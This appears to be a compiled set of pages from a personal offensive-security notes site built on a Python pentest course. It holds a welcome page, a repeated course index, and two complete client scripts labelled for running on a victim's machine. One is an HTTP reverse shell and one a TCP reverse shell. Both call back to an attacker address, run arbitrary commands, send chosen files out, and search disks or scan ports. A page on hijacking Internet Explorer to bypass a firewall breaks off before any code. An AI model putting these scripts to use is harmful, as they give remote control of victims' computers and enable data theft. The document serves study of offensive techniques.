# Table of Contents
- [Welcome to Hacking Life! - Hacking Life](#welcome-to-hacking-life-hacking-life)
- [Coding a reverse shell that searches files - Hacking Life](#coding-a-reverse-shell-that-searches-files-hacking-life)
- [Coding a reverse shell that scans ports - Hacking Life](#coding-a-reverse-shell-that-scans-ports-hacking-life)
- [Hickjack the Internet Explorer process to bypass an host-based firewall - Hacking Life](#hickjack-the-internet-explorer-process-to-bypass-an-host-based-firewall-hacking-life)
- [Bypassing Next Generation Firewalls - Hacking Life](#bypassing-next-generation-firewalls-hacking-life)
- [Bypassing IPS with handmade XOR Encryption - Hacking Life](#bypassing-ips-with-handmade-xor-encryption-hacking-life)
- [TCP reverse shell with AES encryption - Hacking Life](#tcp-reverse-shell-with-aes-encryption-hacking-life)
- [TCP reverse shell with RSA encryption - Hacking Life](#tcp-reverse-shell-with-rsa-encryption-hacking-life)
- [TCP reverse shell with hybrid encryption AES + RSA - Hacking Life](#tcp-reverse-shell-with-hybrid-encryption-aes-rsa-hacking-life)
- [Simple keylogger in python - Hacking Life](#simple-keylogger-in-python-hacking-life)
- [Hijacking Keepass Password Manager - Hacking Life](#hijacking-keepass-password-manager-hacking-life)
- [Dumping saved passwords from Google Chrome - Hacking Life](#dumping-saved-passwords-from-google-chrome-hacking-life)
- [Man in the browser attack - Hacking Life](#man-in-the-browser-attack-hacking-life)
- [DNS poisoning - Hacking Life](#dns-poisoning-hacking-life)
- [Privilege escalation - Weak service file permission - Hacking Life](#privilege-escalation-weak-service-file-permission-hacking-life)
- [Index of downloads - Hacking Life](#index-of-downloads-hacking-life)
- [Unknown](#unknown)
---
# Welcome to Hacking Life! - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/#welcome-to-hacking-life)
Welcome to Hacking Life!
========================
HackingLife is born from the urge to document the knowledge acquired in the cybersecurity field and the need of being able to retrieve it.
But there is something else: I strongly believe there is not much difference between fixing a broken faucet (or opening a lock, or studying the engine of your car, or walking in the countryside, or…) and assessing an environment and describing its vulnerabilities. As a matter of fact, I spend my time doing all these things: fixing, repairing, and creating narratives (yes, writing too) in which magically all parts work together harmonically (or provoke the end of the world harmonically too). Tadam!
Second brain
------------
It's quite intriguing how brains work because it doesn't matter how much information and resources you have available on the Internet, still, this is **something you need to do for and by yourself** if you want to understand in a deep sense what you are doing, keep track of it and so on.
So to be more than clear again: the main reason for this repository to exist is purely selfish. It's me being able to retrieve my notes and build upon them a second brain. Therefore, there is no intention of being exhaustive or giving thoughful explanations about how things work on a deep level.
Acknowledgments
---------------
Nevertheless (and to be fair) this idea is deeply inspired by [Lyz-code](https://github.com/lyz-code)
and their [Blue book](https://lyz-code.github.io/blue-book/)
. Thanks to this inspiring, polished, and... overwhelming repository I've found a way to start making sense of all my notes. Kudos!
> Finally, I would like to highlight that this content may not be entirely original, as I've included some paragraphs directly from different sources. Most of the time, I've included a section at the top of the page to quote sources.
Back to top
---
# Coding a reverse shell that searches files - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#coding-a-reverse-shell-that-searches-files)
Coding a reverse shell that searches files
==========================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Client side
-----------
To be run in the victim's machine.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-33)
[34](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-34)
[35](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-35)
[36](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-36)
[37](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-37)
[38](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-38)
[39](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-39)
[40](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-40)
[41](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-41)
[42](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/#__codelineno-0-42) | `import requests import os import subprocess import time while True: req = requests.get('http://192.168.0.152:8080') command = req.text if 'terminate' in command: break elif 'grab' in command: grab, path = command.split("*") if os.path.exists(path): url = "http://192.168.0.152:8080/store" filer = {'file': open(path, 'rb')} r = requests.post(url, files=filer) else: post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode()) elif 'search' in command: #The Formula is search *. -->for example let's say that we got search C:\\*.pdf command = command[7:] #cut off the the first 7 character ,, output would be C:\\*.pdf path, ext = command.split('*') lists = '' # here we define a string where we will append our result on it #os.walk is a function that will naviagate ALL the directoies specified in the provided path and returns three values:- #1-dirpath is a string contains the path to the directory #2-dirnames is a list of the names of the subdirectories in dirpath #3-files is a list of the files name in dirpath #Once we got the files list, we check each file (using for loop), if the file extension was matching what we are looking for, then we add the directory path into list string. for dirpath, dirname, files in os.walk(path): for file in files: if file.endswith(ext): lists = lists + '\n' + os.path.join(dirpath, file) requests.post(url='http://192.168.0.152:8080', data=lists) else: CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read()) post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read()) time.sleep(3)` |
Last update: 2024-03-29
Created: April 10, 2023 16:52:50
Back to top
---
# Coding a reverse shell that scans ports - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#coding-a-reverse-shell-that-scans-ports)
Coding a reverse shell that scans ports
=======================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
Client side
-----------
To be run on the victim's machine.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-17)
[18](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-18)
[19](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-19)
[20](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-20)
[21](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-21)
[22](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-22)
[23](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-23)
[24](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-24)
[25](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-25)
[26](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-26)
[27](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-27)
[28](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-28)
[29](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-29)
[30](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-30)
[31](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-31)
[32](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-32)
[33](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-33)
[34](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-34)
[35](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-35)
[36](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-36)
[37](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-37)
[38](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-38)
[39](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-39)
[40](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-40)
[41](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-41)
[42](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-42)
[43](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-43)
[44](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-44)
[45](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-45)
[46](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-46)
[47](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-47)
[48](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-48)
[49](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-49)
[50](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-50)
[51](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-51)
[52](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-52)
[53](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-53)
[54](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-54)
[55](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-55)
[56](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-56)
[57](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-57)
[58](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-58)
[59](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-59)
[60](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-60)
[61](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/#__codelineno-0-61) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 import os import socket import subprocess def transfer(s, path): if os.path.exists(path): f = open(path, 'rb') packet = f.read(1024) while packet: s.send(packet) packet = f.read(1024) s.send('DONE'.encode()) f.close() def scanner(s, ip, ports): scan_result = '' # scan_result is a variable stores our scanning result for port in ports.split(','): try: # we will try to make a connection using socket library for EACH one of these ports sock = socket.socket() #connect_ex This function returns 0 if the operation succeeded, and in our case operation succeeded means that the connection happens whihch means the port is open otherwsie the port could be closed or the host is unreachable in the first place. output = sock.connect_ex((ip, int(port))) if output == 0: scan_result = scan_result + "[+] Port " + port + " is opened" + "\n" else: scan_result = scan_result + "[-] Port " + port + " is closed" sock.close() except Exception as e: pass s.send(scan_result.encode()) def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('192.168.0.152', 8080)) while True: command = s.recv(1024) if 'terminate' in command.decode(): s.close() break elif 'grab' in command.decode(): grab, path = command.decode().split('*') try: transfer(s, path) except: s.send(str(e).encode()) pass elif 'scan' in command.decode(): # syntax: scan 10.10.10.100:22,80 command = command[5:].decode() #slice the leading first 5 char ip, ports = command.split(':') scanner(s, ip, ports) else: CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) s.send(CMD.stdout.read()) s.send(CMD.stderr.read()) def main(): connect() main()` |
Last update: 2024-03-29
Created: April 10, 2023 16:52:50
Back to top
---
# Hickjack the Internet Explorer process to bypass an host-based firewall - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#hickjack-the-internet-explorer-process-to-bypass-an-host-based-firewall)
Hickjack the Internet Explorer process to bypass an host-based firewall
=======================================================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
For our script to bypass a host-based firewall (based on an ACL), we will hijack the Internet Explorer process to conceal our traffic and bypass it.
Client side
-----------
Make sure that the victim machine (a windows 10) has installed these two python libraries: pypiwin32 and pywin32.
To be run on our victim's machine.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-15)
[16](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-16)
[17](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#__codelineno-0-17)
